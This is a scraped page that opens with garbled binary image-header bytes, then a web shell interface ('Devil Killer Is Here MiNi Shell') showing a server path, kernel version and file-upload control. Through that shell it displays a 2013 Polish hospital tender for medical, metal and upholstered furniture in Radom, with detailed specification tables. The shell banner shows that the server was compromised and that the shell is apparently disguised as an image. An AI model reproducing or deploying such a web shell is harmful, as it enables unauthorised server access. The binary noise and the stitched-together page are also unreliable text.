JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130701/252698-N-2013.html

<p class="kh_header"><b>Radom: na zakup i dostawę mebli medycznych, metalowych, kuchennych, biurowych, tapicerowanych dla potrzeb Oddziału Chorób Wewnętrznych z Odcinkiem Gastroenterologii 1 Dnia i Odcinkiem Alergologii Radomskiego Szpitala Specjalistycznego.</b><br>
<b>Numer ogłoszenia: 252698 - 2013; data zamieszczenia: 01.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Lekarska 4, 26-610 Radom, woj. mazowieckie, tel. 48 3615285, 3615284, faks 48 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na zakup i dostawę mebli medycznych, metalowych, kuchennych, biurowych, tapicerowanych dla potrzeb Oddziału Chorób Wewnętrznych z Odcinkiem Gastroenterologii 1 Dnia i Odcinkiem Alergologii Radomskiego Szpitala Specjalistycznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa mebli medycznych, metalowych, kuchennych, biurowych, tapicerowanych dla potrzeb Oddziału Chorób Wewnętrznych z Odcinkiem Gastroeneterologii 1 Dnia i Odcinkiem Alergologii Radomskiego Szpitala Specjalistycznego.
Przedmiot zamówienia obejmuje dostarczenie, zamontowanie i ustawienie mebli w miejscach wskazanych przez Zamawiającego.
Część 1 meble medyczne atestowane
I. Opis mebli medycznych:
1.	Korpusy oraz półki mebli wykonane z płyty wiórowej obustronnie laminowanej o gr 18 mm. Widoczne krawędzie oklejone obrzeżem ABS lub PCV o gr 0,5 - 1 mm w kolorze laminatu płyty
2.	Wszystkie półki o regulowanej wysokości
3.	Widoczne zewnętrzne części korpusu szafek nie mogą mieć widocznych elementów łączeniowych (zachowanie jednolitej nienaruszonej płaszczyzny laminatu)
4.	Tylne ścianki wykonane z płyty pilśniowej HDF o gr min. 3 mm jednostronnie laminowane w kolorze białym
5.	Widoczne tylne ścianki szafek z płyty korpusowej bez widocznych elementów łączeniowych
6.	Szafki dolne i szafy podwieszane, wyposażone w systemy zawieszek regulowanych w dwóch płaszczyznach o wytrzymałości min. 200 kg na szafkę, uniemożliwiający przypadkowe ich zdjęcie
7.	Niektóre szafki dolne i szafy na cokole z uszczelką silikonową przy posadzce lub nóżkach (zgodnie z rysunkami)
8.	Szafki górne wyposażone w systemy zawieszek regulowanych w dwóch płaszczyznach
9.	Zawiasy puszkowe wyposażone w zintegrowane elementy amortyzujące gwarantujące ciche domykanie 
10.	Szafki górne klapowe wyposażone w podnośniki gazowe 
11.	Prowadnice szuflad łożyskowane ze zintegrowanymi bokami metalowymi zapewniające pełny wysuw oraz dociąg i ciche domykanie (typu tandembox firmy BLUM lub podobny), wytrzymałość  dynamiczna min 30 kg
12.	Fronty płaskie wykonane z płyty MDF gr. 19 mm, zaokrąglone na zewnętrznych krawędziach, o promieniu R=3mm, pokryte jednolitą folią PCV  na wszystkich widocznych krawędziach  o gr. 0,3-0,4 mm, wewnętrzna strona frontu pokryta laminatem przeciwprężnym w kolorze białym.  
13.	Uchwyty metalowe galwanizowane w kolorze chromu, satynowe o rozstawie ok. 120 mm. Uchwyt o prostym kształcie (bez ostrych załamań i krawędzi) umożliwiający łatwe czyszczenie
14.	Uchwyty w pomieszczeniach zabiegowych j.w. lecz ze stali nierdzewnej
15.	Blaty szafek i blaty robocze gr. 38mm pokryte laminatem o gr. min. 0,6 mm, od czoła wykończony w kształcie litery U z zabezpieczeniem przeciwwodnym, widoczne pozostałe krawędzie blatu wykończone z tworzywa sztucznego (ABS lub PCV)
16.	Blaty biurek gr. 38 mm pokryte laminatem o gr. min. 0,6 mm, widoczne krawędzie blatu wykończone z tworzywa sztucznego (ABS lub PCV)
17.	W blatach i korpusach przelotki na przewody - 20szt.
18.	Nóżki do szafek metalowe chromowane o średnicy 50 mm, wys. 10cm z możliwością regulacji wysokości
19.	Kółka do szafek mobilnych przystosowane do miękkiego podłoża
20.	W blatach nad grzejnikami należy wmontować kratki PCV przepuszczające ciepło o wym. 80x10 - 10szt.
21.	Podstawa pod komputer - PCV, na kółkach, o regulowanej szerokości - 20szt.
22.	Półki PCV pod klawiaturę, mocowana pod blatem - 20szt.
Uwaga: 
23.	W opisie asortymentu wszystkie podane głębokości są liczone bez frontów, a wszystkie wysokości podane są z grubością blatu
24.	Wszystkie wymiary należy skorygować podczas wizji lokalnej przed przystąpieniem do realizacji zamówienia
25.	Kolorystyka mebli do uzgodnienia po wyborze oferenta przed przystąpieniem do realizacji zamówienia.
26.	Odporność na środki myjąco-dezynfekujące przeznaczone do mebli medycznych.
27.	Okres pełnej gwarancji 36 miesięcy.  
28.	Na widocznych elementach mebli pojedynczych należy nakleić silikonowe naklejki z danymi producenta oraz trwałe odporne na wilgoć i środki dezynfekcyjne naklejki o wymiarach ok. 9,5 cm (szerokość) x 3,5 cm (wysokość). Wzór naklejki zostanie przekazany Wykonawcy najpóźniej w dniu zawarcia umowy.
II. Wykaz mebli
PUNKT PIELĘGNIARSKI STRONA KOBIECA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafka górna wisząca	600	400	300	3
2	Szafka górna wisząca	800	750	300	1
3	Szafka górna wisząca	330	750	300	2
4	Zestaw szafek dolnych stojących 	1460	850
	500
	1
5	Biurko z nadstawką z kontenerem na nóżkach aluminiowych
+ blat roboczy
z kontenerem na nóżkach aluminiowych
(wym. kontenerów 400x770x550)	1200
2360	800
800	600
400	1
6	Witryna podwieszana częściowo przeszklona	500	1800	300	1
POM. 1.37 - POKÓJ PRZYGOTOWAWCZY
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	1800	1800	600	1
2	Szafka górna wisząca	600	400	300	3
3	Półka wisząca	270	400	300	1
4	Zestaw szafek dolnych podwieszanych /4x400x650x550-drzwiczki/
przykrytych jednym blatem (w blacie otwór na zlewozmywak)	2370	850	600
	1
POM. 1.33 - GABINET DIAGNOSTYCZNO-ZABIEGOWY
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafka górna wisząca	600	400	300	4
2	Zestaw szafek dolnych podwieszanych (2x800x650x550-szuflady, 1x800x650x550 drzwiczki, 1x400x650x550-drzwiczki, 1x400x820x550-kontener na nóżkach aluminiowych)
przykrytych jednym blatem narożnym 	3700x1540	850	600	1
3	Szafka zlewozmywakowa podwieszana 	800	650	550	1
POM. 1.32 -  SEKRETARIAT
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa ubraniowa podwieszana	1000	1800	600	1
2	Witryna podwieszana z częściowo otwartymi półkami	1500	1800	600	1
3	Szafka wisząca	700	400	300	1
4	Biurko narożne z dwoma kontenerami stałymi i jednym kontenerem mobilnym /wym. kontenerów 400x720x550/	2800x2100	750	600	1
POM. 1.31 -  POKÓJ ORDYNATORA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa ubraniowa na cokole	600	2000	600	1
2	Witryna na cokole z częściowo otwartymi półkami	1600	2000	300	1
3	Szafka wisząca	700	400	300	1
4	Biurko narożne z jednym kontenerem stałym na nóżkach aluminiowych /wym. kontenera 400x720x550/	2000x1600	750	600	1
POM. 1.59 -  MAGAZYN BIELIZNY CZYSTEJ
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Regał z półkami na cokole	2880x2290x1900	3200	600	1
POM. 1.60 -  POKÓJ PIELĘGNIARKI ODDZIAŁOWEJ
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Witryna podwieszana z częścią ubraniową	1000	1800	600	1
2	Witryna podwieszana częściowo przeszklona	880	1800	600	1
3	Witryna podwieszana	1000	1800	300	1
4	Biurko narożne z dwoma kontenerami stałymi na nóżkach aluminiowych /wym. kontenerów 400x720x550/	2100x1600	750	600	1
5	Półka wisząca	1270	350	300	1
6	Półka wisząca	1800	350	300	1
POM. 1.27 -  GABINET ZABIEGOWY
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Witryna podwieszana częściowo przeszklona	800	1600	600	1
2	Witryna podwieszana częściowo przeszklona	1000	1600	600	1
3	Szafa podwieszana	1000	1600	400	1
4	Szafka wisząca górna	600	400	300	3
5	Półka wisząca	700	400	200	1
6	Zestaw szafek podwieszanych dolnych (3x400x550x550-drzwiczki), przykryte jednym blatem narożnym	2500x1150	800	600	1
7	Szafka górna wisząca	700	400	300	2
8	Zestaw szafek podwieszanych dolnych (1x600x550x550-drzwiczki, 1x800x550x550-drzwiczki), przykryte jednym blatem z otworem na zlewozmywak	1400	800	600	1
POM. KORYTARZ
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Zabudowa wnękowa	2260	3200	640	1
POM. 1.14 -  POKÓJ LEKARSKI - POBYT DZIENNY
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Witryna na cokole z częściowo otwartymi półkami	1460	2000	320	1
2	Półka wisząca	3000	540	320	1
3	Biurko z dwoma kontenerami stałymi na nóżkach aluminiowych /wym. kontenerów 400x720x550/	3000	750	600	1
4	Szafa ubraniowa na cokole (3x400)	1200	2000	600	1
5	Szafa ubraniowa na cokole
(1x400)	400	2000	600	1
6	Biurko z dwoma kontenerami stałymi na nóżkach aluminiowych /wym. kontenerów 400x720x550/	3480	750	600	1
POM. 1.12 -  POKÓJ LEKARSKI
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Półka wisząca	1220	540	320	1
2	Biurko narożne z kontenerem mobilnym /wym. kontenera 400x720x550/	1420x2420	750	600	1
3	Szafa ubraniowa na cokole (8x400)	3200	2000	600	1
4	Szafka wisząca górna	875	400	300	4
5	Zestaw szafek podwieszanych dolnych (2x550x650x550), przykrytych jednym blatem	1750	750	600	1
POM. 1.24 -  KUCHNIA ODDZIAŁOWA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Witryna na cokole częściowo przeszklona	950	2100	600	1
2	Szafka wisząca górna	600	750	300	1
3	Szafka narożna wisząca górna 	800	750	800	1
4	Szafka wisząca górna	800	750	300	3
5	Zestaw szafek stojących (2x200x820x550-kargo, 1x400x820x550-drzwiczki, 1x800x800x820-szafka narożna, 1x800x820x550, 1x800x820x550-szuflady) przykryte jednym blatem	1400x3720x1030	850	600	1
6	Zestaw szafek stojących (1x500x820x550-drzwiczki, 1x800x700x820-szafka narożna, 1x800x820x550-szuflady) przykryte jednym blatem	1320x1610	850	600	1
POM. 1.22 - POKÓJ SOCJALNY STRONA MĘSKA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	1200	1800	600	1
2	Szafka górna wisząca	600	400	300	3
3	Półka wisząca	520	400	300	1
4	Zestaw szafek dolnych podwieszanych /4x400x650x550-drzwiczki/
przykrytych jednym blatem (w blacie otwór na zlewozmywak) 	2320	850	600
	1
DYŻURKA PIELĘGNIAREK STRONA MĘSKA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafka górna wisząca	600	400	300	4
2	Biurko z nadstawką z kontenerem na nóżkach aluminiowych (wym. kontenerów 400x770x550)
+ blat roboczy z zestawem szafek podwieszanych (4x400x620x550)	2840x2100	800	600	1
3	Witryna podwieszana częściowo przeszklona	500	1800	300	1
POM. 1.18 - MAGAZYN PUNKTU PIELĘGNIARSKIEGO
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Zabudowa wnękowa	750	600	2530	1
POM. 1.06 - SALA NADZORU INTERNISTYCZNEGO
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	1080	1800	600	2
2	Szafka górna wisząca	500	400	300	2
3	Witryna podwieszana częściowo przeszklona	1000	1800	600	1
4	Blat na wspornikach	1000	850	600	1
5	Zestaw szafek wiszących	1570	750	300	1
6	Zestaw szafek podwieszanych dolnych	1570	650	850	1
7	Konsola półokrągła	2750	700	1375	1
POM. 1.16 - SALA NADZORU INTERNISTYCZNEGO
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	1000	1800	300	1
POM. 1.40 - MAGAZYN BIELIZNY BRUDNEJ
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	800	1800	300	1
Część 2 meble metalowe
1.	Przedmiot zamówienia stanowią meble metalowe (regały) oraz wózki oddziałowe
2.	Asortyment objęty niniejszym zamówieniem, stanowić będzie wyposażenie pomieszczeń szpitala z przeznaczeniem do przechowywania urządzeń narzędzi i przyrządów przed i po sterylizacji, środków czystości, BHP.
3.	Oferowany asortyment musi być odporny na środki myjąco-dezynfekujące przeznaczone do mebli medycznych.
4.	Przed przystąpieniem do realizacji zamówienia należy dokonać inwentaryzacji pomieszczeń w celu ewentualnej korekty parametrów.
5.	Okres pełnej gwarancji na 36 miesięcy.  
6.	Jakiekolwiek odstępstwa od podanych wymagań spowodują automatyczne odrzucenie oferty.
7.	Na widocznych elementach mebli pojedynczych należy nakleić silikonowe naklejki z danymi producenta oraz trwałe odporne na wilgoć i środki dezynfekcyjne naklejki o wymiarach ok. 9,5 cm (szerokość) x 3,5 cm (wysokość). Wzór naklejki zostanie przekazany Wykonawcy najpóźniej w dniu zawarcia umowy.
I.	Wykaz mebli metalowych (regałów)
POM. 1.40 - POMIESZCZENIA GOSPODARCZE /POM.PORZĄDKOWE/
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Regał z półkami	2000	2000	350	1
POM. 1.40 - POMIESZCZENIA GOSPODARCZE /BRUDOWNIK/
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Regał z półkami	1200	2000	300	1
2	Regał z półkami	1000	2000	300	1
POM. 1.26 - MAGAZYN SPRZĘTU
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Regał narożny z półkami	2000x1600	2000	600	1
II.	Wykaz wózków oddziałowych
Lp.	Parametry wymagane
1.	WÓZEK DO PRZEWOŻENIA POTRAW I - szt. 1
1.1	Wózek wykonany z kształtowników stalowych pokrytych lakierem proszkowym.
1.2.	Wyposażenie wózka :
a). 2 blaty wykonane w formie wyjmowanych tac ze stali kwasoodpornej, ułożonych w dwóch poziomach
b). uchwyt do prowadzenia wózka
c). dodatkowa , uchylna półka umocowana przy górnym blacie
d). cztery kółka o średnicy min.100 mm, w tym 2 z blokadą
1.3.	Wymiary wózka:
a). długość - 1.000 mm (? 100 mm)
b). szerokość - 650 mm (? 50 mm)
c). wysokość - 1.000 mm (? 100 mm)
1.4.	Gwarancja min. 24 miesiące.
2.	WÓZEK DO PRZEWOŻENIA POTRAW II - szt. 1
2.1.	Wózek wykonany z kształtowników stalowych pokrytych lakierem proszkowym.
2.2.	Wyposażenie wózka :
a). 2 blaty wykonane w formie wyjmowanych tac ze stali kwasoodpornej , ułożonych w dwóch poziomach
b). uchwyt do prowadzenia wózka
c). cztery kółka o średnicy min.100 mm, w tym 2 z blokadą
2.3.	Wymiary wózka:
a). długość - 1.000 mm (? 100 mm)
b). szerokość - 650 mm (? 50 mm)
c). wysokość - 1.000 mm (? 100 mm)
2.4.	Gwarancja min.24 miesiące.
3.	WÓZEK NA ODPADY POTRÓJNY - szt. 2
3.1.	Wózek przeznaczony do składowania i przewozu odpadów i brudnej bielizny w workach foliowych
3.2.	Wózek potrójny przystosowany do worków foliowych o pojemności 100 - 120 litrów
3.3.	Pokrywy wózka podnoszone pedałem nożnym, każda osobno.
3.4.	Zabezpieczenie przed zsunięciem się worka z obręczy w postaci klipsów zaciskowych
3.5.	Stelaż wózka wykonany ze stali pokrytej powłoką niklowo-chromowa,trwałą i odporną na korozję
3.6.	Pokrywy i podstawa wózka wykonane z tworzywa ABS o podwyższonych własnościach mechanicznych i odporności na promieniowanie UV
3.7.	Wózek wyposażony w 4 koła o średnicy min.50 mm, w tym 2 z blokadą.
3.8.	Wózek łatwy w utrzymaniu w czystości, odporny na środki dezynfekcyjne
3.9.	Wymiary skrajne wózka :
a). długość - 1.210 mm (? 20 mm)
b). szerokość - 400 mm (? 20 mm)
c). wysokość - 860 mm (? 30 mm)
3.10.	Gwarancja min.24 miesiące.
4.	STATYW DO POMPY INFUZYJNEJ - szt. 20
4.1.	Statyw do mocowania od 1 do 4 pomp
4.2.	Stabilna podstawa o średnicy 780-800 mm
4.3.	Podstawa wyposażona w 5 kółek (w tym 2 z blokadą)
4.4.	Kolumna statywu wykonana ze stali chromowanej o wysokości 1900-1950 mm, w górnej części wyposażona w wieszak do kroplówek
4.5.	4-krotne gniazdo sieciowe zainstalowane na podstawie statywu
4.6.	Gniazdo wyposażone w sygnalizację zasilania, przewód przyłączeniowy o długości min. 4 m, bolce uziemiające, sygnalizację napięcia na poszczególnych gniazdach, dwa wymienne bezpieczniki, atestowana obudowa.
4.7.	Waga statywu max. 6 kg
4.8.	Gwarancja 24 m-ce
5.	STOLIK (WÓZEK) ODDZIAŁOWY - NA LEKI - szt. 2
5.1.	Stolik wykonany z kształtowników stalowych pokrytych lakierem proszkowym
5.2.	Skład wyposażenia:
a). cztery tace ze stali kwasoodpornej umieszczone na dwóch poziomach
b). tace wypełnione przegródkami na leki ,tace wykonane z tworzywa
c). uchwyt do prowadzenia wózka
d). cztery koła samonastawne , w tym dwa z blokadą
e). dwie uchylne miski na odpady
5.3.	Wymiary wózka :
a). długość: 660 mm (? 50 mm)
b). szerokość: 420 mm (? 50 mm)
c). wysokość: 870 mm (? 50 mm)
5.4.	Gwarancja min.24 miesiące.
6.	STOLIK (WÓZEK) ODDZIAŁOWY - WIELOFUNKCYJNY - szt. 2
6.1.	Stolik wykonany z kształtowników stalowych pokrytych lakierem proszkowym
6.2.	Skład wyposażenia :
a). blat (taca) ze stali 
b). dwie półki poniżej blatu, w dwóch poziomach, w postaci koszy drucianych
c). uchwyt worka na odpady
d). uchwyt do prowadzenia wózka
e). cztery koła samonastawne , w tym dwa z blokadą
6.3.	Wymiary wózka:
a). długość: 810 mm (? 50 mm)
b). szerokość: 430 mm (? 50 mm)
c). wysokość: 890 mm (? 50 mm)
6.4.	Gwarancja min.24 miesiące.
7.	WÓZEK FUNKCYJNY RATUNKOWY - szt. 1
7.1.	Szkielet wózka, blat górny i szuflady wykonane z materiału charakteryzującego się wysoką wytrzymałością i twardością, stal nierdzewna lub tworzywo BAYDUR
7.2.	Konstrukcja wózka wyposażona w centralny system zamknięcia wszystkich szuflad - zamykany na klucz
7.3.	Wymiary zewnętrzne wózka:
a). wysokość 90 cm +/-5cm
b). głębokość 72 cm +/-5cm
c). szerokość 83 cm +/-5cm
7.4.	Wózek wyposażony w:
a)	Trzy szuflady o wysokości 100mm
b)	Dwie szuflady o wysokości 150 mm
7.5.	Czoła szuflad z przezroczystymi pojemnikami z możliwością umieszczenia opisu identyfikującego zawartość szuflad. Pojemniki szuflad jednoczęściowe - odlane w formie bez elementów łączenia, bez miejsc narażonych na kumulację brudu i ognisk infekcji
7.6.	Układ jezdny wysoce mobilny: 4 koła jezdne, w tym 2 z blokadą o średnicy min. 65 mm, z elastycznym niebrudzącym podłóg bieżnikiem rozmieszczone w równych odległościach od siebie (kwadracie) zwiększające zawartość wózka lub system z piątym centralnie umiejscowionym kołem.
7.7.	Wyposażenie podstawowe wózka:
a). blat zabezpieczony przed zsuwaniem się przedmiotów
b).uchwyt do przetaczania
c). kosz na odpadki
d). co najmniej 2 przezroczyste umożliwiające identyfikację tego co znajduje się w środku odchylane pojemniki kieszenie
e). wysuwana spod blatu półka do pisania
f). półka na żel
g). uchwyt na butle z tlenem
h). zintegrowane dwie boczne szuflady wysuwane spod blatu: jedna z wkładem ze stali nierdzewnej, druga na leki natychmiastowego użycia - ratujące życie z przezroczystą ścianką pozwalające na ich identyfikację.
Wymienione wyposażenie nie powoduje zwiększenia gabarytów wózka i nie narażające na ich uszkodzenie - zintegrowane w budowie wózka
7.8.	Wyposażenie dodatkowe (wymagane wraz z dostawą)
a). wieszak kroplówki
b). półka na defibrylator
c). zasilanie elektryczne
d). dodatkowa półka na ssak
e). płyta do masażu serca
8.	WÓZEK FUNKCYJNY UŻYTKOWY - szt. 2
8.1.	Szkielet wózka, blat górny i szuflady wykonane z materiału charakteryzującego się wysoką wytrzymałością i twardością, stal nierdzewna lub tworzywo BAYDUR
8.2.	Konstrukcja wózka wyposażona w centralny system zamknięcia wszystkich szuflad - zamykany na klucz
8.3.	Wymiary zewnętrzne wózka:
a). wysokość 90 cm +/-5cm
b). głębokość 72 cm +/-5cm
c). szerokość 83 cm +/-5cm
8.4.	Wózek wyposażony w:
a)	Trzy szuflady o wysokości 100mm
b)	Dwie szuflady o wysokości 150 mm
8.5.	Czoła szuflad z przezroczystymi pojemnikami z możliwością umieszczenia opisu identyfikującego zawartość szuflad. Pojemniki szuflad jednoczęściowe - odlane w formie bez elementów łączenia, bez miejsc narażonych na kumulację brudu i ognisk infekcji
8.6.	Układ jezdny wysoce mobilny: 4 koła jezdne, w tym 2 z blokadą o średnicy min. 65 mm, z elastycznym niebrudzącym podłóg bieżnikiem rozmieszczone w równych odległościach od siebie (kwadracie) zwiększające zwrotność wózka lub system z piątym centralnie umiejscowionym kołem.
8.7.	Wyposażenie podstawowe wózka:
a). blat zabezpieczony przed zsuwaniem się przedmiotów
b).uchwyt do przetaczania
c). kosz na odpadki
Wymienione wyposażenie nie powoduje zwiększenia gabarytów wózka i nie narażające na ich uszkodzenie - zintegrowane w budowie wózka
9.	Statyw do kroplówek - szt. 10
9.1.	Kolumna statywu wykonana ze stali szlachetnej o regulowanej wysokości
9.2.	Krzyżak do butelek ze stali szlachetnej, 4 haki, obciążenie 2 kg na każdy hak
9.3.	Blokada ręcznego ustawienia wysokości statywu
9.4.	Stabilna podstawa, wyposażona w 5 kółek (w tym 2 z blokadą)
9.5.	Ciężar statywu max. 4 kg
9.6.	Gwarancja 24 m-ce
Część 3 meble tapicerowane, stoliki
1.	Przedmiot zamówienia stanowią meble tapicerowane i stoliki.
